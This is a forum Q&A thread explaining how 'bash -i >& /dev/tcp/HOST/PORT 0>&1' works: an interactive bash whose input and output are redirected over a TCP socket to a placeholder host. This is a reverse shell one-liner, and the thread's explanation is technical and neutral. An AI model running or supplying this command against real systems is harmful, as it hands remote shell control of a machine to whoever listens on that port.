# Meaning of bash -i >& /dev/tcp/HOST/PORT 0>&1?

Tags: bash, io-redirection, firewall, tcp

I tried

```
bash -i >& /dev/tcp/HOST/PORT 0>&1
```

but it does not seem to work behind firewalls. What does this code actually do, which ports are forwarded and could it work behind firewalls?

Answer (score 24):

This snippet runs a new interactive instance of bash (`bash -i`), on a TCP connection to the specified port on the specified host which is created for the duration of the bash process. Standard output and standard error are sent through this connection (`>& /dev/tcp/HOST/PORT`), and standard input is read through this connection (`0>&1` — this should be `0<&1` but `0>&1` works too).

There is no port forwarding going on. Obviously, a TCP server of some kind has to be listening and accepting connections on that HOST:PORT, and the firewall has to let the connection through.

Comment: What connection is '/dev/tcp/HOST/PORT' Where is the host defined and where is the port defined?

Comment: @Helos Did you literally see `/dev/tcp/HOST/PORT`? I assumed that you'd replaced a name by `HOST` and a number by `PORT`. Otherwise you'd get an error message from bash. Since you didn't mention any error message, I presume that you didn't see one.

Comment: @Gilles, I can't digest the `0<&1` part. I read it as 'take bash stdout (`&1`) and pipe it into bash stdin (`0`)', which makes sense. Can you please explain how this part works?

Comment: @golem This is a redirection. No pipe is involved. `0<&1` means connect whatever is currently opened on file descriptor 1 to file descriptor 0. Since the previous redirection `>& /dev/tcp/HOST/PORT` connected fd 1 (the default for an output redirection) to `/dev/tcp/HOST/PORT`, i.e. opened a TCP socket, this duplicates the TCP connection to file descriptor 0 (i.e. the same socket is now also open on fd 0, this is different from 0</dev/tcp/HOST/PORT which would open a different socket to the same server).

Comment: *Connecting* was a keyword to my understanding; calling the process *piping* was indeed what confused me.